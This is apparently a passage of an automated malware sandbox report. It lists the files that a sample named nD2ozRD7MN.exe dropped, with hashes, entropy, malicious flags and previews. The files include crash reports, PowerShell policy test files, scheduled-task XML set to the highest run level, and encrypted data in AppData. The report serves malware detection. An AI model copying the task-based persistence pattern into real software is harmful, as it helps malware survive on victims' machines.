SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nD2ozRD7MN.exe_4fa1da79cea2cbf32999c8e1107f97476821d1_8feead53_d883b67e-1feb-4267-a892-15cd5ec5b08e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1990386229233096
Encrypted:	false
SSDEEP:	192:rV8870MLLHzKla6E+mVjWezuiFaZ24IO8C:Z88IMHHulazHWezuiFaY4IO8C
MD5:	A07401CB7FBE32C2CA0E42C3C483FE9D
SHA1:	AB45C14430E2DC5BA026BE44ED90948AA34BE5D8
SHA-256:	88B8CC4E6D65B3F21089086D3BCFF42423A3414CFE217C448B7C8F8C63452340
SHA-512:	A60069A4D08CEBA1923F422F39AE169F13E91093DA0579AD4784EBFEE82D7B90436D5A3A3F3AD84AA311FDDE4706C53DABC3D01B89D3A42F8E5A6DDB5E82757E
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.1.2.0.3.0.4.4.1.0.5.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.1.2.0.6.7.6.1.2.9.2.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.8.3.b.6.7.e.-.1.f.e.b.-.4.2.6.7.-.a.8.9.2.-.1.5.c.d.5.e.c.5.b.0.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.8.0.1.0.1.c.-.0.5.4.0.-.4.9.c.e.-.a.0.a.8.-.a.5.5.e.b.0.1.e.7.5.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.D.2.o.z.R.D.7.M.N...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.F.V.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.9.8.-.0.0.0.1.-.0.0.1.4.-.0.c.a.4.-.e.b.8.b.1.d.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.c.1.2.7.0.b.e.d.8.0.4.1.7.0.0.b.d.c.4.8.a.c.b.8.6.4.e.1.2.a.9.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.6.3.2.1.1.4.a.7.0.a.9.a.d.4.b.1.6.e.d.6.8.6.e.4.8.4.7.7.f.3.9.8.5.3.1.a.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3715.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Nov 1 05:21:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1466116
Entropy (8bit):	4.755836271095738
Encrypted:	false
SSDEEP:	24576:VhCiQCCeqGSu6Wi+KmyOa2CeqGSgLtWwHFN73zvLHD/bXTPrnjf73zvLIBtZFR9G:/9DxWQWG
MD5:	A3F3B8023C6D0E022F33AB3E753F366C
SHA1:	1F67B89300B9DC98DCAE8F7B11925029396ECC9D
SHA-256:	A817F91BB4F1580FD172CA7F8227F0D6472D64B9B274044D088EFE0145BD527A
SHA-512:	0213F49876779AFF481A657A15FE23FE5E9B7E585D7959180B12B2E54EFD0286709CFEB38F95AEE688BF4C00A77412A5E84F576BFF5F0A9B0C7080F2932D9B3E
Malicious:	false
Preview:	MDMP..a..... .......Be$g....................................$...P.......;..nn..........`.......8...........T............M..t...........t..........`,..............................................................................eJ.......,......GenuineIntel............T............d$g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC750.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6318
Entropy (8bit):	3.722533970358103
Encrypted:	false
SSDEEP:	192:R6l7wVeJsm6V4Y6JKMeKCpDy89bwbwsfFWjm:R6lXJt6V4Y6JKUEwbDfo6
MD5:	26B4E57A7037180940503DC344BC4BEB
SHA1:	1C5293B39894D64B7F7350E97472610FC82E8751
SHA-256:	1BAC9E9B8DAF2C3A3CFD909C4BBC9DC530A6C12989C6E25D9C7848CB0AC8808B
SHA-512:	72A7C58E25FB8A761D763FD028A829AFFF31A1C19A455BCA7DA802165318CE091AE697785C9209B2874CFB26A51FF12C8E6EDB8B4D7EDFB9A1798F104BFCD21A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC79F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4644
Entropy (8bit):	4.4639391718989
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9LoWpW8VY0JYm8M4JU9HNVFQ8+q8C9H3MrpN3Im9d:uIjfJI7BB7VcJWHvVH8T3IMd
MD5:	F49AE278F2291E15D537A15DA5859C4D
SHA1:	A6D61A677C4ADCE7577BF5058AA38A114DB00D97
SHA-256:	5737DAA9AF2245527DDA4A360ED368D51E3D4CF5809945A98322E6AF0A724B85
SHA-512:	A2BA53880BCD7C1430E00F161FFA66690227DE5B4B06EA333E1C04F9B9D6A702357CAA3B17C2BD82BF088829CE2194517F08DEB15279172F67884C3A0B35B82C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="568583" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dnshost.exe.log

Download File

Process:	C:\Program Files (x86)\DNS Host\dnshost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nD2ozRD7MN.exe.log

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ohjy5so.4eb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czbpvgmy.cwb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmfjbfr1.d2r.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqck4s30.o1a.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pduy52k5.4a5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi4k1zyf.1x5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3r1hvfs.xda.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sudve215.sqg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4g4q4fv.uf3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujtan33d.4pj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvi5vtw4.jjn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcimjcld.jah.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	5.11003407909062
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0PLxtn:cbk4oL600QydbQxIYODOLedq3SLj
MD5:	63E43F0266922DB9BB32551F27EA60BE
SHA1:	187EC9ADFF6B58AAA6185E5F433D3C2A7CE8213D
SHA-256:	34466210F4FF45B59CF8163728AF02E9C64CD5F1F40439275A51060C245A8CED
SHA-512:	66B55E7C27D2F14392990A9A9D9681661E8040C9E430C8C58FBE362538CD6701A70B7B18645282CDF6927F33AABF270CECD96FF6AEE7C08D56567410D459F7D5
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	5.104451641222393
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R9lxtn:cbk4oL600QydbQxIYODOLedq3S9lj
MD5:	CFD32F0E8DBE9B358E7445116E8FC086
SHA1:	00D89923A223372FAC166743853397ABD974825B
SHA-256:	3662F5D5D156CFA337FF07F335FC9D34B46E66DB3A7A2CF69C820DD4BA273ADD
SHA-512:	A190E08EDA457DF3FA3C25AA4C1211DDB8377B2C04BB3B16110F5C0FF1E440A709A1FB6543357C8625C323A1BF4E52ECF74115C1382A6EC10BBA657F42DF5014
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\catalog.dat

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\run.dat

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
